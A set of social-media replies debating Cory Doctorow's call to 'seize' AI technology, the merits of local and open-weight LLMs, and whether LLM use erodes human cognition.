@marcel
Cool, I guess you could block and mute half the fediverse if that's what you'd rather.
Or they've already done it to you and I'm just now realising why, every day's a learning day!
@marcel
lol here is leagues much more 'emotional and black-and-white' by that particular metric.
the truth is that this is just the world now, it's how a *lot* of people genuinely feel about AI there is no cleanly waving them away as unreasonable and emotional. well anyway I like your posts here, but be prepared for minor or major shitstorm anytime AI comes up.
@chfour
67, no, obviously not.
The attention economy, well yeah, it is different. It's not limited to the younger generation, seems like older people are worse if anything.
Is it really a problem to be concerned about the effects that extremely addictive and disuptive digital platforms might have upon children?
Things are actually getting worse and it won't necessarily turn out to be okay just because we adapted to other things in the past.
@komali_2 @xgranade
Of course any such potential usage is a minefield of issues, but this has me thinking.
Because if (keyword being *if*) there were such a usage, that might give some credence to Cory's call the seize the tech, so that we might employ it without dependence on the hostile entities which control it.
Is it wrong to say we really ought to have our own versions of these tools, just in case? Maybe they really will turn out to be useless. But we surely cannot have exhausted all possibilities already, especially with our limited access to these tools.
If a usecase like that is found, we better be able to control it. An anti-stylometry tool we don't fully control would be an absolute disaster... I've heard of attacks embedded in the weights.
@glyph
I wasn't sure about this thread at first but I think it actually has a fair point:
(https://hci.social/@fasterandworse/116104437434039067)
I do think Corys imperative to 'seize' the tech is dubious. Firstly because without open weights we're hardly there, I mean, any experimentation is very limited and the models we would use are permanently stuck in place (which poses concerns about wether embedding open models but closed weights tools in our workflows would induce a kind of material dependency on unethical LLM production after all). But more pressingly, it does imply a that LLMs are somehow inherently valuable and that controlling them would indeed allow us to leap ahead and replace the properietary models. What if there's nothhing to replace and we're better off rejecting the technology?
Still, I just think there might be edge cases, or just unexpected useful areas of application big or small. Like spellcheck and transcription, it has many issues but maybe it's the best we've got until something else comes along, maybe not.
Cory Doctorow's ultimate crooked point is that you're fucked if you don't embrace AI. Local models, whatever. He compares technologies that have been proven valuable with a product that is being predicted to be valuable. It's a variation of the assumption that everyone who hates AI hasn't *tried* it. If only they would give it a chance, they'd not be left behind.
@glyph
The idea of spellchecking and grammatical standards themselves could be criticised, the way LLM use affects our cognitive abilities could be criticised. But I'm not yet seeing a critque that totally eclipses the possibility that such experimentation might yield an unexpected result?
(of course I'm strictly assuming such experimentation can be done with reasonable sustainability and doesn't involve the current ethical issues in training new LLMs, and I think Cory's current usecase *probably* fits within those parameters)
@glyph
Still, I think that despite the existence of an emerging (not the ones limited to the big tech use of LLMs) argument comphrensively against use of LLM tech, it's still based on what we know about the tech right now. Are we not ultimately limited by our lack of experience? We surely haven't exhausted the possibilities of experimentation with this still new technology, and furthermore our ability to experiment thus far is has been limited by the properatary status of the models and weights, as well as the hardware requirements inherent to the training process.
I get that a lot of people are uninterested in such experimentation or see it as fruitless, and they may end up being right. But why shouldn't Cory or others be able to experiment and experience different possibilities for their workflow, to see how it affects them?
@glyph
Of course LLMs have certain biases and hallucinations, but the pre-existing tech also has certain patterns of distrortions and false positives (Cory claims improvement here, that the LLM produces less false positives). The question seems to me to be if those kinds of problems inherent to LLMs, that is things like the tendancy to 'hallucinate' and the unreliability/undeterministic nature, do in fact justify the position that LLM use is fruitless or even harmful in those applications.
I think I do lean toward the position that there is something fundamental about LLM tech that applies in a locally hosted open-source context that does in fact cause problems, there's something about ceding human agency in such a way that disrupts our congitive abilties in a bad tradeoff. It's obvious with excessive use but I do wonder if it applies even in very minor cass. I look forward to reading your article which seeks to critique locally hosted LLMs specifically, if you do write it.